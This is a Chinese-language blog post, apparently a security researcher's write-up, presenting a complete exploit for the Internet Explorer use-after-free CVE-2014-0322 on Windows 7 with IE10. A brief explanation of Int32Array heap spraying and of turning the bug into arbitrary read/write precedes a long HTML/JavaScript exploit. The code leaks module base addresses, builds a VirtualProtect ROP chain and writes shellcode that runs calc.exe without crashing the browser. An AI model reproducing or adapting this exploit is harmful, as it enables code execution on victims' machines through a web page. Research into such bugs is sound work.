• CVE-2014-0322 (MS14-012) exploit


    最近在研究js中IntArray、Int32Array等相关Array Object进行Heap Spraying的方法,关于Array Object Heap Spraying的方法上篇文章已经说过,这里不再赘述。今天,主要以cve-2014-0322这个漏洞为例,来看一下Array Object Heap Spraying具体如何使用,以及怎样将UAF类型的转换为任意地址读写,同时,来看一下如何保证IE漏洞利用时不崩溃。

    UAF转换为任意地址读写,无非是程序流程上的控制,主要是漏洞触发点函数以及后续的相关处理流程,只要有对释放后对象内存进行写操作的,大部分我们都可以进行后续的利用,将其与Array相结合,从而实现任意地址读写。

    转换为任意地址的读写的好处在于更便于流程的控制,以及后续shellcode的触发。本样例中shellcode的触发借鉴了原始样本中shellcode触发的思想,都是修改pvftable,然后调用相应的Array函数,从而触发shellcode。

    对于如何保证IE漏洞利用后不崩溃,目前能想到的就是借用ROP构造的临时栈进行跳转,实现shellcode的利用,利用完成后,恢复到esp到原始栈空间,并且还原修改过的内存,最后jmp到正确的Array函数中。这种方法有其局限性,但也有它的好处。局限性在于对于不同的函数而言,可能对寄存器还有所要求,并且其esp恢复时,ebp减去的值并不固定,需要根据情况硬编码。其好处在于函数的选择权在我们手里,只有有一个函数能够实现这种方法,它就具有通用性,因为对于同一函数而言,其内部的调用过程都是一定的,这样我们恢复的时候就较为简单。其代码如下所示,win7+IE10。

    <html>
    <head id="headId">
    <title>main page</title>
    <script>
    function dword2data(dword) {
        var d = Number(dword).toString(16);
        while (d.length < 8)
            d = '0' + d;
        return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
    }
    
    var g_arr = [];
    var arrLen = 0x50;
    
    function fun()
    {
        var a=0;
        // to alloc the memory
        for(a=0;a<arrLen;++a)
        {
            g_arr[a]=document.createElement('div')
        };
    
        var b = dword2data(0x41414141);
        var c = 0x0a0bf000;
        while(b.length<0x360) 
        {
            if(b.length==(0x94/2)) b+=dword2data(c+0x20-0xc);
            else if(b.length==(0x98/2)) b+=dword2data(c+0x20-0x8);
            else if(b.length==(0xac/2)) b+=dword2data(0x0a0b001b-0x10);
            else if(b.length==(0x15c/2)) b+=dword2data(0x42424242);
            else b += dword2data(0x41414141);    
        }
        var d=b.substring(0,(0x340-2)/2);
        try{
            this.outerHTML=this.outerHTML
        } catch(e){}
        CollectGarbage();
        //to reuse the freed memory
        for(a=0;a<arrLen;++a)
        {
            g_arr[a].title=d.substring(0,d.length);
        }
    }
    function puIHa3() {
        var a = document.getElementsByTagName("script");
        var b = a[0];
        b.onpropertychange = fun ;
        var c = document.createElement('SELECT');
        c = b.appendChild(c);//
    }
    
    var x = new Array();
    var xx = new Array();
    function LargBlock() {
        for (var k=0;k<0x10;k++)
        {
            if(k==0) xx[k] = new ArrayBuffer();
            else xx[k] = new ArrayBuffer(0x2000);
        }
    }
    
    function spray() {
        for (var k=0;k<0x800;k++)
        {
            x[k] = new Array(0x3bf8);
            for (var i = 0; i< 0x55;i++)
            {
                x[k][i] = new Int32Array(xx[0]);
            }
            for(;i<0x3bf8;i++)
            {
                x[k][i] = i;
            }
        }
    }
    
    function findArray(size) {
        for (var k=0;k<0x800;k++)
        {
            for (var i = 0; i< 0x55;i++)
            {
                if(x[k][i].length != 0)
                {            
                    return [k,i];
                }
            }
        }
        return -1;
    }
    
    function dll_baseaddress(address,index) {
        var pp = address & 0xffff0000;
        var count=0;
        while(1)
        {        
            if(x[index[0]][index[1]][pp/0x4] == 0x00905a4d) 
            {
                return pp;
            }
            else pp=pp-0x10000;
            count++;
            if(count==50) return -1;
        }
    }
    
    function module_baseaddress(other_baseaddress,index,name) {
        var e_lfanew = x[index[0]][index[1]][(other_baseaddress+0x3c)/4];
        var image_file_header = other_baseaddress+e_lfanew;
        var image_data_directorys = image_file_header+0x78;
        var import_table_address = other_baseaddress+x[index[0]][index[1]][image_data_directorys/4+2];
        var import_table_size = x[index[0]][index[1]][image_data_directorys/4+3];
    
        for(var k=0;k<import_table_size/0x14;k++)
        {
            var import_dll_address = import_table_address + k*0x14;
            var dll_name_address = other_baseaddress+x[index[0]][index[1]][import_dll_address/4+3];
    
            if(x[index[0]][index[1]][dll_name_address/4]==name[0] && 
                x[index[0]][index[1]][dll_name_address/4+1]==name[1])
            {
                var first_thunk = other_baseaddress+x[index[0]][index[1]][import_dll_address/4+4];
                var function1 = x[index[0]][index[1]][first_thunk/4];
                return dll_baseaddress(function1,index);
            }
        }
        return -1;
    }
    
    function GetEIP(index) {
        
    }
    
    function judge(test,index) {
        if(x[index[0]][index[1]][test/4]==x[index[0]][index[1]][test/4+8])
        {
            return 1;
        }
        else 
        {
            return -1;
        }
    }
    
    LargBlock();
    spray();
    puIHa3();
    
    for(var k=0;k<0x800;k++)
    {
        x[k][15358] = 0x20000000;
    }
    
    var info = findArray(0x20000000);
    x[info[0]][info[1]][0x0a0bf018/4] = 0x20000000;
    
    var pvftable_int32array = x[info[0]][info[1]][0x0a0bf000/4];
    
    var jscript9_base_address=dll_baseaddress(pvftable_int32array,info);
    
    var kernel32_base_address=module_baseaddress(jscript9_base_address,info,[0x4e52454b,0x32334c45]);
    
    var msvcrt_base_address = module_baseaddress(jscript9_base_address,info,[0x6376736d,0x642e7472]);
    
    var ntdll_base_address = module_baseaddress(kernel32_base_address,info,[0x6c64746e,0x6c642e6c]);
    var xx_2 = x[info[0]][info[1]][0x0a0bf020/4];
    
    //for test
    if(judge(xx_2,info)) {
        
        //x[info[0]][info[1]][0x0a0bf030/4] = 0;
        //x[info[0]][info[1]][0x0a0bf048/4] = 0x100;
        //x[info[0]][info[1]+1][0] = 0;
        //alert('1');
        var xx_3 = x[info[0]][info[1]][xx_2/4+0xc];
        var xx_4 = x[info[0]][info[1]][xx_2/4+0x2c];
        
        //for(var k=info[1]+1;k<0x55;k++)
        //{
        //    delete x[info[0]][k];
        //}
        //CollectGarbage();
        //for(var k=info[1]+1;k<0x55;k++)
        //{
        //    x[info[0]][k] = new Int32Array(xx[1]);
        //}
        
        delete x[info[0]][info[1]+1];
        CollectGarbage();
        x[info[0]][info[1]+1] = new Int32Array(xx[4]);
        delete x[info[0]][info[1]+2];
        CollectGarbage();
        x[info[0]][info[1]+2] = new Int32Array(xx[5]);
        //for(var k=0;k<0x150/4;k++)
        //{
            //x[info[0]][info[1]+1][k] = jscript9_base_address+0x0003845e;
        //}
        
        x[info[0]][info[1]+1][0x140/4] = jscript9_base_address+0x0003845e;  //xchg eax,esp#retn
        x[info[0]][info[1]+1][0] = kernel32_base_address+0x000020d8; //VirtualProtect
        x[info[0]][info[1]+1][1] = x[info[0]][info[1]][0x0a0bf07c/4];
        x[info[0]][info[1]+1][2] = x[info[0]][info[1]][0x0a0bf07c/4]&0xffff000; //Address
        //alert(x[info[0]][info[1]+1][1].toString(16));
        x[info[0]][info[1]+1][3] = 0x1000; //size
        x[info[0]][info[1]+1][4] = 0x40; //newprotect:page_execute_readwrite
        x[info[0]][info[1]+1][5] = 0x0a0bf038; //oldprotect
        x[info[0]][info[1]+1][6] = x[info[0]][info[1]][0x0a0bf04c/4]+0x40;
        x[info[0]][info[1]+1][7] = 5; //ret address
        //
        //xB8xADx23x86x7C
        //[info[0]][info[1]][0x0a0bf04c/4]+0x40;
    
        //calc.exe
        x[info[0]][info[1]+1][16] = 0x636c6163;
        x[info[0]][info[1]+1][17] = 0x6578652e;
        
        var HeapDataAddress = x[info[0]][info[1]][0x0a0bf04c/4];
        var HeapEntry1 = x[info[0]][info[1]][HeapDataAddress/4-2];
        var HeapEntry2 = x[info[0]][info[1]][HeapDataAddress/4-1];
        
        x[info[0]][info[1]+1][32] = HeapEntry1;
        x[info[0]][info[1]+1][33] = HeapEntry2;
        
        //shellcode
        //B8 78563412                    mov eax,0x12345678
        //FFD0                           call eax
        //8BE5                           mov esp,ebp
        //83EC 78                        sub esp,0x78
        //B8 78563412                    mov eax,0x12345678
        //BB 30F00B0A                    mov ebx,0xA0BF030
        //B9 30F00B0A                    mov ecx,0xA0BF030
        //C705 30F00B0A 78563412         mov dword ptr ds:[0xA0BF030],0x12345678
        //C705 18F00B0A 00000000         mov dword ptr ds:[0xA0BF018],0x0
        //C705 78563412 78563412         mov dword ptr ds:[0x12345678],0x12345678
        //C705 78563412 78563412         mov dword ptr ds:[0x12345678],0x12345678
        //FFE0                           jmp eax
        x[info[0]][info[1]+2][0] = ((kernel32_base_address+0x8edae)<<8) + 0xB8;
        x[info[0]][info[1]+2][1] = (kernel32_base_address>>24)+0x8bD0ff00;
        x[info[0]][info[1]+2][2] = 0x78EC83e5;
        x[info[0]][info[1]+2][3] = 0xb8 + (x[info[0]][info[1]][(pvftable_int32array+0x140)/4] << 8);
        x[info[0]][info[1]+2][4] = (x[info[0]][info[1]][(pvftable_int32array+0x140)/4] >> 24) + 0xf030bb00;
        x[info[0]][info[1]+2][5] = 0x30b90a0b;
        x[info[0]][info[1]+2][6] = 0xc70a0bf0;
        x[info[0]][info[1]+2][7] = 0x0bf03005;
        x[info[0]][info[1]+2][8] = 0x0a + (pvftable_int32array << 8);
        x[info[0]][info[1]+2][9] = (pvftable_int32array >> 24) + 0x1805c700;
        x[info[0]][info[1]+2][10] = 0x0a0bf0;
        x[info[0]][info[1]+2][11] = 0xc7000000;
        x[info[0]][info[1]+2][12] = 0x05 + ((HeapDataAddress-0x8)<<8);
        x[info[0]][info[1]+2][13] =((HeapDataAddress-0x8)>>24) + (HeapEntry1 << 8);
        x[info[0]][info[1]+2][14] = (HeapEntry1>>24) + 0x05c700 + ((HeapDataAddress-0x4)<<24);
        x[info[0]][info[1]+2][15] = ((HeapDataAddress-0x4)>>8) + (HeapEntry2 << 24);
        x[info[0]][info[1]+2][16] = (HeapEntry2 >> 8) + 0xff000000;
        x[info[0]][info[1]+2][17] = 0xe0;
    
        
        //alert('1');
        x[info[0]][info[1]][0x0a0bf030/4] = x[info[0]][info[1]][0x0a0bf04c/4];
        x[info[0]][info[1]+1][0] = 0;
        //alert('1');
        
        //delete x[info[0]][info[1]+1];
        //delete x[info[0]][info[1]+2];
        //CollectGarbage();
    }
    </script>
    </head>
    </html>
  • 相关阅读:
    EOS之session的数据获取
    c# 数据库操作之ACCESS
    基础之创建与导出
    dotNET5的MVC页面传值方式总结
    dotNET开发之MVC中Controller返回值类型ActionResult方法总结
    C# 计算农历日期方法(2021版)
    普通邮箱设置客户端授权码并开启stmp服务以及关于QQ邮箱“命令顺序不正确。 服务器响应为:Error: need EHLO and AUTH first !”问题全指导
    13 张图,深入理解 Synchronized
    Springboot 注解大全
    python中的print()函数的学习-1
  • 原文地址:https://www.cnblogs.com/wal613/p/3963318.html
Copyright © 2020-2023  润新知